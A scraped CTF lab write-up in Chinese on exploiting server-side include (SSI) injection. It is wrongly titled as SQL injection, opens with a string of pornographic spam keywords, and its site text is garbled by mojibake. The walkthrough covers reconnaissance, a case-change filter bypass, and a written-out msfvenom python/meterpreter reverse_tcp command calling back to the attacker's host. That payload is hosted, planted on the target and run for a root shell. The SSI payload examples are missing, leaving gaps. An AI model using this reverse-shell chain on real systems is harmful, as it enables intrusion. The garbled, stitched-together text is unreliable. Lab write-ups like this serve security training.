日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當(dāng)前位置: 首頁 > 编程语言 > php >内容正文

php

ctf php sql注入,CTF—攻防练习之HTTP—SQL注入(SSI注入)

發(fā)布時(shí)間:2023/12/4 php 37 豆豆
生活随笔 收集整理的這篇文章主要介紹了 ctf php sql注入,CTF—攻防练习之HTTP—SQL注入(SSI注入) 小編覺得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.

主機(jī):192.168.32.152

靶機(jī):192.168.32.161

ssI是賦予html靜態(tài)頁面的動(dòng)態(tài)效果,通過ssi執(zhí)行命令,返回對(duì)應(yīng)的結(jié)果,若在網(wǎng)站目錄中發(fā)現(xiàn)了.stm .shtm .shtml等,且對(duì)應(yīng)SSL輸入沒有過濾

該網(wǎng)站可能存在SSI注入漏洞

ssi注入就是尋找輸入點(diǎn)輸入類似 格式,看看能不能運(yùn)行系統(tǒng)命令。

如??

切換目錄

nmap,nikto 分析,發(fā)現(xiàn)可能存在SSI注入,

dirb 看看目錄

index目錄下,有個(gè)SSi語句

SSI目錄下看到應(yīng)該是和命令注入有關(guān)

通過robots.txt目錄挖掘到站點(diǎn)的根目錄

打開網(wǎng)頁找一個(gè)注入點(diǎn),測(cè)試后,在這里找到,發(fā)現(xiàn)有過濾,大小寫可繞過,網(wǎng)頁給出的測(cè)試命名少了個(gè)!符號(hào),加上測(cè)試成功

此時(shí)我們就可以嘗試生成一個(gè)python shell 上傳到網(wǎng)站服務(wù)器根目錄上,再執(zhí)行反彈監(jiān)聽

msfvenom -p python/meterpreter/reverse_tcp lhost=192.168.32.152 lport=4444

在打開msfconsole監(jiān)聽

此時(shí)再將生成的pyshell上傳至web根目錄(/var/www/html),再打開apache服務(wù)器

在開啟apache服務(wù)器,查看狀態(tài)

再將pyshell下載到站點(diǎn)上

再提權(quán)

然后啟動(dòng)python pyshell.py,成功反彈shell!

隨后,進(jìn)入shell,優(yōu)化終端,可以進(jìn)入root目錄

總結(jié)

以上是生活随笔為你收集整理的ctf php sql注入,CTF—攻防练习之HTTP—SQL注入(SSI注入)的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò),歡迎將生活随笔推薦給好友。